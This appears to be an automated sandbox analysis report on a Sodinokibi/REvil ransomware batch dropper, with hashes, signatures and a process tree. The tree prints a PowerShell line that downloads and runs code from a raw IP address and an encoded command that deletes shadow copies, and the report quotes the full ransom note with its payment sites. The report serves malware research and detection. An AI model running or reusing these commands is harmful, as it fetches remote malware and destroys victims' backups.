Analysis

  • max time kernel
    23s
  • max time network
    65s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    02-06-2020 10:10

General

  • Target

    421a8c43602d912fb7d54f525915eee9.bat

  • Size

    220B

  • MD5

    c786b66ecefc50b20289a9d38575b5a2

  • SHA1

    a1851402b42988ea349215149d3ca3b2890eb425

  • SHA256

    bf0760cd225ed3fc4df18cf25a62e6f2f45c50f3e4726d258981e81b68e2bd65

  • SHA512

    3dc1d42fda27a8b7c9e3c2b32c957f19a619d035ed0609fea3181efac5c037e516b4184659e69fc0821db6fb56f68052f7a23248c05ddac25964357dd6193a77

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/421a8c43602d912fb7d54f525915eee9

Extracted

Path

C:\c82t9od-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and stolen, we already have 250gb your files. You can check it: all files on your system has extension c82t9od. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A8D042B21194D3AC 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/A8D042B21194D3AC Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: OeWQrbrE6wEPypEOwnvGSrssA8EjpSX7fRnA9lSjST6jCBRaBn9K8Rwgs5O9aBmO OZ7yIyDRl7WwsvmNABcxXO5ZlyItoLtHEoIFw+m2dJKMLjBATbUbX/LpGv9l/laC m/AsP3s6qiJ/tP2xc52NPJrwZN/9+ycwyrBdWoknjlwI8Hdg/ASosOY+/zA6DLa6 13p7a1+fi6480jrTxVMT/ozVplAJRBU2zGESPavJCd4eAw4Mtc4URYd1adbTcd/i 8ifVPQNNEt8Cmk5mSG4NITrQFClF+lUvnV9VjdZb+JozinI8ue1jxiuB4GeS7+si 4S9PGHXcfViIk/zAevS0Q2c+a6fPruPXysDi7kWvgeU2Uo1bZAgIy7/s9HCGTk7u 8N7IemOiso54LfcDB0cFMEiOx+IHUFPnML8Y/HMY6SFqIe495sL+tfzgSTn8EBRR kc95Q4alTCe7pDcHEe91Q2NbRUlmWBvPhXGIaM1b9pl9HonCMrCMtNJcpOVCjxee 9++qZE3QuvzI9RTK2mDQU234DSXk+EHcjU0enx9IUMxprn6znMtT2lVaGwDxdVIt NbXYcVJnatdjKbwSs22O8FN5PMUDeFVdRXgTv9Jcqv5UOAqiCFZo+nu0RY6hD6hp DXfoAr5QKqllZoITor3Z30ujo6tPIYoRw9SyYavZPnyuc6JhASayJcDDSxcziNBI ygg4+4Z9SFGIXbdXFQDjgiZNCHpkTVJ65QsXTacL+g3cFxZOf9E6lyY/w1kyLeKk bk8Ez/Bh0zoN5rxyqiTlaP6lJtx8wJHXd90pN0bEPtTrGeJ18hkp74klO8n3OFMx QtscuBsriKBhZuIOtnJz7WiELbmwkEcjUfCvBAG+CB+zOrQlEelCccOF+gVa3ZnS w5kTT5xAXwgQcFatccQumJjHwpz9t1scaUU9Jl3k6g549PfLcN1OMfTi1lqpSbZN IDQUebGsXKbPn7Zjc1pMs8V7p0vV5TGzK+cmXiAnWGmU65rwMj6vr+dopv1a5PI7 gteA5i/zfXUIWuwjs5rylze+o/RNKVIG1VlEBAAUujJplTecIYf2b+oQxnMH/Azo zqOSYGa4ErGrccVkHDcMlKgFT4sUMyniPiC5HzI+cCLH7+PxF3oGfy7GLv3JVhCT bigWWsNOkek+JLfp7eNoQx9cMx5JG2+1GrTJEkBMiJQjU3RzsyLEM34s1bnKXlUf agHaizSjRtUiEekfpxbFCCVCV06yLsGjg3YuQM9yVF21dFHHJMbVWG2TUMs9fwra M1F3y9HG7UXllveyoUqrP6nOcTBVyNraXnk3bK2HGbuFBg== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A8D042B21194D3AC

http://decryptor.cc/A8D042B21194D3AC

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Drops file in Program Files directory 26 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\421a8c43602d912fb7d54f525915eee9.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:800
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/421a8c43602d912fb7d54f525915eee9');Invoke-GIEGCPPTNOCAU;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      PID:1140
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1776
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1588

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms